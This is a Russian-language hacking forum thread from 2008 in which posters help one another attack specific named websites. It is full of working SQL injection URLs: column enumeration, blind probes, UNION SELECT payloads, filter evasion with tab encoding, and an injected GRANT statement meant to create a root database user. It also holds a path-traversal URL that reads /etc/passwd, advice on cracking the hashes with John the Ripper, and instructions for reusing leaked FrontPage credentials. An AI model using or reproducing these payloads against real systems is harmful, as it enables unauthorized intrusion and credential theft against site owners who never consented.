<!-- Database error in vBulletin 3.6.8: Invalid SQL: SELECT userid, adminid,bandate, liftdate, reason FROM userban WHERE liftdate > 0 ORDER BY order by 1-- ASC; MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1-- ASC' at line 1 Error Number : 1064 Date : Thursday, January 17th 2008 @ 04:26:06 PM Script : http://hip-hop.ru/forum/ban.php?by=order%20by%201-- Referrer : IP Address : my_ip Username : my_nickname Classname : vB_Database -->
мну эта еще не проходил, дай мануал/статью
спасибо много нового узнал но так ни че с этим и не получилось я раззстроен... всем спасибо за помощь
Red_Red1
17.01.2008, 18:35
Не могу понять
http://www.federalspace.ru/DocDoSele.asp?DocID=46 это урл правильный
Пробую так http://www.federalspace.ru/DocDoSele.asp?DocID=46-1
Выдает значение эквивалентное http://www.federalspace.ru/DocDoSele.asp?DocID=45
Дополнительно пробую http://www.federalspace.ru/DocDoSele.asp?DocID=46+order+by+16-- - ОШИБКА! order+by+15-- ВСЕ НОРМАЛЬНО!
Делаю вывод что возможна скуль-иньект. Но выполнить иньекцию не выходит :( Почему так?
В других скриптах на этом сайте похожая ситуация.
Ордер выдает что полей 15 а униону пофек ^^
Ага, там стоит старая бд! Так что придется делать инъект в слепую...
select то работает:
http://www.federalspace.ru/DocDoSele.asp?DocID=46%20and%201=(select 1)-- :)
Собсна,вопрос: Как создать пользователя в бд с правами рута,если есть доступ к mysql.user?
GRANT ALL PRIVILEGES ON *.* TO xek@% IDENTIFIED BY "пароль" WITH GRANT OPTION
или
INSERT INTO user VALUES("%","xek",PASSWORD("пароль"),"Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y");
news.php?id=850+union+select+0,1,2,3,4,GRANT+ALL+P RIVILEGES+ON+*.*+TO+0xek@%+IDENTIFIED+BY+"пароль"+WITH+GRANT+OPTION,6,7+from+mysql.user/*
таг?) откуда столько Y :PP
blackybr
18.01.2008, 20:11
не получится, если идет select ты никак не проведешь update или любой другой запрос кроме select и union select
Такая проблемка, в MSSQL обычная инъекция /rating.asp?sender=1'
sender при вводе фильтруется на пробел, плюс и дефис. Пробел заменил на таб %09, не знаю что с дефисом сделать. А без него не закомментить ненужную часть запроса,
там остаётся: ' order by blablabla
Другой комент /* выдаёт ошибку, # тоже не коментит =\
Например
sender=5'%09UNION%09SELECT%09*%09FROM%09INFORMATIO N_SCHEMA.TABLES%23
вызывает ошибку
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark after the character string ' group by sender'.
т.е. строка получается:
INFORMATION_SCHEMA.TABLES#' group by sender'.
Можно это как-то обойти?
Можно. Просто сделать второй юнион :)
Можно. Просто сделать второй юнион :)
пробовал, но ещё бы я знал названия таблиц и колнок :confused:
пробовал, но ещё бы я знал названия таблиц и колнок :confused:
Ну information_schema должна быть.
script.asp?sender=1'%09union%09select%09*%09from%0 9information_schema.tables%09union%09select%09null
Что-то типа того
Что-то типа того
Блин, никак не канает :mad:
Узнал по ошибкам, что таблица rating, есть колонки ID и Sender.
=5'%09UNION%09SELECT%09sender%09FROM%09rating%09WH ERE%09'1'='1
ошибка:
Column 'rating.Sender' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
т.е. запрос "SELECT sender FROM rating WHERE '1'='1' group by sender" не канает... хз какой там оригинальный запрос :(
1.Как можно извернуться в случае если фильтруется (хз как назвать) слово select, как только пишешь в запрос
?id=6+union+select
сразу появляется:
Precondition Failed
The request was not completed due to preconditions that are set in the request header.
Preconditions prevent the requested method from being applied to a resource other than the one intended.
2. И что еще делать если отсутствуют выводимые поля?
2Momiji
1. Не могу сказать точно, но думаю что на серваке стоит mod_security, если это так, то имхо бесполезно
2. почитай про Blind sql инъекции, на ачате полно статей и ответов на этот вопрос
2PunkAss
имхо фигню делаешь, кроме того что в mssql возможно разделение запросов, ты union select неправильно используешь, да и вобще, если очень надо кидай сюда ссыль посмотрим
http://cleverclub.nashe.ru/rating_d.asp?sender=1'
Да вся проблема правильно закончить свой запрос, чтобы в итоге общий был верный. Плохо скуль знаю, научите :p
На некоторых фтп есть папка , _vti_pvt, там есть файл servise.psw , а нём логин и пароль, от чего они ?
На некоторых фтп есть папка , _vti_pvt, там есть файл servise.psw , а нём логин и пароль, от чего они ?
FrontPage
Lesnoy_chelovek
20.01.2008, 15:46
Tyc00n, я хочу неменого уточнить ответ Nea7, там пароли от содениения с узлом с помощью FrontPage. То есть тебе достаточно их расшифровать и вставить в свою версию FP. Далее можешь спокойно логинится к сайту.
http://www.biotechcenter.org/include/down.php?filename=../../../../etc/passwd
как можно получить пассы если не получается залогиниться на сервере, расшифровать ))? что еще можно с этого взять?
Basurman
20.01.2008, 23:54
доступ к серверу.
Хеш типа MD5(unix) или MD5 freebsd
Подбирается при помощи PasswordsPro или John the Ripper
PasswordsPro если не ошибаюсь нужен словарь, да? а что еще можно выудить?
У меня вопрос,как узнать название таблиц и,или колонок в бд sqlite,инъекция есть,вывод тоже,а вот дальше нифига не пойму что делать,подскажите плиз
код:
http://www.newusedcars.ru/?id=9836+union+select+1#
Предпологая что название таблиц можно посмотреть таким оброзом:
http://www.newusedcars.ru/?id=98360000+union+select+tbl_name+from+SQLITE_MAS TER--
а вообще как с ней работать смотри тут http://www.sqlite.org/
Я так понял такой функции как information_schema в такой бд не используется?
А как составить запрос типа concat(table_name,0x3a,column_name) ?
вопрос по mysql inj
в mysql есть функции concat и concat_ws.
CONCAT если увидит в скобках хоть одно NULL - она вернет NULL. Однако CONCAT_WS просто исключит из соединения NULL-значение.
в возвращаемых запросом данных есть null, но нужно, чтобы оно отображалось как null или просто пустое место, т.е. не игнорировалось. что можно сделать?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot